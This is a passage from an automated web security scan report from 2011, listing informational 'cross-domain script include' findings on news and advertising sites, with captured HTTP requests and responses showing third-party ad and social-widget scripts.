var zzSection=76;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3340.152125.OZONEMEDIA.COM/B5807973;sz=728x90;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=1015462%3Bn=1185%3Bx=3597%3Bc=1185000589%2C1185000589%3Bg=172%3Bi=1%3B1=8%3B2=1%3Bs=76%3Bg=172%3Bm=82%3Bw=47%3Bi=1%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bp%3D8%3Bf%3D1235423%3Bh%3D1197692%3Bb%3D1440%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

22.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-7641565019577886&format=728x90_as&output=html&h=90&w=728&region=test&ad_type=image&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&dt=1315103194528&bpp=15&shv=r20110824&jsv=r20110719&correlator=1315103194603&frm=8&adk=2733553199&ga_vid=1678687974.1315103195&ga_sid=1315103195&ga_hid=256457380&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=-12245933&bih=-12245933&ifk=3717608154&fu=0&ifi=1&dtd=79 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 02:25:56 GMT
Server: cafe
Cache-Control: private
Content-Length: 3764
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

22.17. http://hits.truehits.in.th/data/c0002761.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/c0002761.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /data/c0002761.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 4 Sep 2011 02:02:00 GMT
Cache-Control: max-age=1800
Expires: Sun, 4 Sep 2011 2:55:02 GMT
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Content-Length: 478
Connection: close
Date: Sun, 04 Sep 2011 02:25:02 GMT
Server: lighttpd

var hash="3fbOcpOvxZ4hUP7wA/uRcQ==";var turlnameindex='nationmultimedia.com';
var _hsv='lvs.truehits.in.th';
var _ht='goggen.php';
var _ctg='stat.php?login=nation';
var _hc='c0002761';
var truehitsurl
...[SNIP]...
</script>");
document.write("<script src='http://addoer.com/showfixads.php?tabname="+_hc+"&frame=yes'></script>
...[SNIP]...

22.18. http://idiva.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idiva.com
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php HTTP/1.1
Host: idiva.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: fromSite=deleted; expires=Sat, 04-Sep-2010 04:14:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 136285

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
<script type="text/javascript" src="//secure-uk.imrworldwide.com/v60.js">
</script>
...[SNIP]...

22.19. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/osapi-0.8.xml&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917%26title%3DTurkish%2BAir%2Bplane%2Bskids%2Boff%2Btaxiway%2Bat%2BMumbai%2Bairport%26ctype%3Dstory%26identifier%3Dstory-130917 HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 02:33:23 GMT
Cache-Control: private,max-age=300
Date: Sun, 04 Sep 2011 02:28:23 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 121870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script>(function(){var a=window;function b(d){this.t={};this.tick=function(d,h,c){c=
...[SNIP]...
<body dir="ltr"><script src="http://www.google.com/friendconnect/script/gadget_util.js?d=0.560.7" type="text/javascript">
</script>
...[SNIP]...

22.20. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media1.bangkokpost.com
Path:   /ads/Innity/030911TourismMalaysia728x90.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ads/Innity/030911TourismMalaysia728x90.html HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "807082134"
Last-Modified: Sat, 03 Sep 2011 08:01:02 GMT
Content-Length: 550
Connection: close
Date: Sun, 04 Sep 2011 02:52:05 GMT
Server: lighttpd/1.4.22

<!-- Ad Tag: Bangkok Post - TH_Tourism Malaysia - ASEAN_2011 -->
<script type="text/javascript">
innity_country = "TH";
innity_path = "/201105_3898/14638/";
innity_proxy = "proxy_35480";
innity_o
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.innity.com/global.js"></script>
...[SNIP]...

22.21. http://member.bangkokpost.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://member.bangkokpost.com
Path:   /login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login.php HTTP/1.1
Host: member.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:28:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post -
...[SNIP]...
</script>
           <script type="text/javascript" src="http://hits.truehits.in.th/data/s0028944.js"></script>
...[SNIP]...

22.22. http://ndtvjobs.bixee.com/search/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ndtvjobs.bixee.com
Path:   /search/search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/search/ HTTP/1.1
Host: ndtvjobs.bixee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:57 GMT
Server: ibibo-WS
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<center>
<script language="javascript" type="text/javascript" src="http://s1.bixee.ibcdn.com/js/globe_nav.js"></script>
...[SNIP]...
</script>
<script src="http://s1.bixee.ibcdn.com/js/bixeejobs.1276601074.js" type="text/javascript"></script>
...[SNIP]...

22.23. http://netspiderads2.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ads.dll/getad?slotid=36953 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 02:35:23 GMT
Content-Type: text/html
Content-Length: 2723

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0" STYLE="background-color:transparent"></a><style type="t
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

22.24. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle?RM_Exclude=& HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660; OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:30:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R03PUO3022VvT|O1022bkP|O1022jF2; expires=Wed, 04-Sep-13 03:30:23 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2090
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N553.martinimedianet/B5114832.11;sz=300x250;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/martinimediainc.com/passback/L2
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N553.martinimedianet/B5114832.11;abr=!ie;sz=300x250;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/martinimediainc.com/passback/L28/424039412/Middle/Martini/digitas_amex_fem_07_070611_336/amex_fem_ron_300.html/4d686437616b3569384d634142634167?%%CLICK%%/Martini/digitas_amex_fem_07_070611_336/pos/Middle/page/martinimediainc.com/passback/L28/ord/424039412?;pc=OAS_amex_fem_ron_300;ord=424039412?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

22.25. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top HTTP/1.1
Host: oasc12.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:17:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 486
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<!-- Turn Ad Code -->\n');
document.write ('<script type="text/javascript">\n');
document.write (' turn_ad_publisher = 3750564;\n');
document.write (' turn_ad
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ad2.turn.com/server/ad_call.js"></script>
...[SNIP]...

22.26. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@Top HTTP/1.1
Host: oasc12.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:16:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 486
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<!-- Turn Ad Code -->\n');
document.write ('<script type="text/javascript">\n');
document.write (' turn_ad_publisher = 3750564;\n');
document.write (' turn_ad
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ad2.turn.com/server/ad_call.js"></script>
...[SNIP]...

22.27. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top HTTP/1.1
Host: oasc12.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:17:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 486
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<!-- Turn Ad Code -->\n');
document.write ('<script type="text/javascript">\n');
document.write (' turn_ad_publisher = 3750564;\n');
document.write (' turn_ad
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ad2.turn.com/server/ad_call.js"></script>
...[SNIP]...

22.28. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms?01AD=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg&01RI=9A4FEFFF11C0CF6&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; A07L=CT-1; ACID=Rq690013151032380008; ASCID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bcg4i5EBAAAABAAAAEAAgEA; BASE=oTwUgn8fYrESn1B!; ROLL=XpwfYsHr/Y/PQCL!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924216.800700.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:04:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 607
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:04:39 GMT
Connection: close
Set-Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; expires=Sun, 02-Oct-2011 03:04:39 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bgs6i5EBAAAABAAAAQIASEA; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: BASE=oTwU6n8fYrESn1x8Qj3fRMy2B+vjVEHntdO7zpq9oQmkUQOfNzVeo/Q5dYCetd+R/VlITpQfPOUsbbj+pnMLNfBe9fnQLuLn9xikW3Jh5OoVuUMh/BIsMV8iPy2BtcWfXIfMiw7+OMKalrgWYeeNQFCpfXb1VEv0cHsxuTJBgslffdkG7KRfwyvkPxeMWLYNGk8b1YA5ZAxZ13KVsZVXrXYYjnmkAAK!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: ROLL=XpwfCsHr/Y/PQCLUeRRTtt2oYGcdkyfKC9wh3xK/PCaAn1iIwv0zeaXV4OrEbOoMlyB7+9MpX6VwzAST0/+akVnT3g4UEMP57hFdkrM6/aUrBbArbW/6ycoQ622FNcK6vnsyTNNOrLANP7s7ffSv/iN2X7QQFvxkaY0/ZGTQjjSjcY3TDpzci4TsvbMO4QGQ7ofB9wJJg67LD1PYDy0Q8zYz/O8Z6ZN!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000924216/cstr=88962478=_4e62eac8,8667764868,800700^924216^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64?trg=;ord=8667764868?">');document.write('<\/SCRIPT>
...[SNIP]...

22.29. http://social.ndtv.com/NDTVProfit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /NDTVProfit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /NDTVProfit HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/home.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _SUPERFLY_nosample=1; PHPSESSID=06690e83b26d060ea9197b90799f6b1f; __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.5.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; _chartbeat2=efl9lo3odsxv1y4d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 61917
Expires: Sun, 04 Sep 2011 03:38:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:38:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div id="root">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tweetmeme.com/i/scripts/follow.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=ndtvsocial"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

22.30. http://social.ndtv.com/groups.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /groups.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /groups.php HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:19:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:19:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div id="root">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- Place this tag in your head or just before your close body tag -->
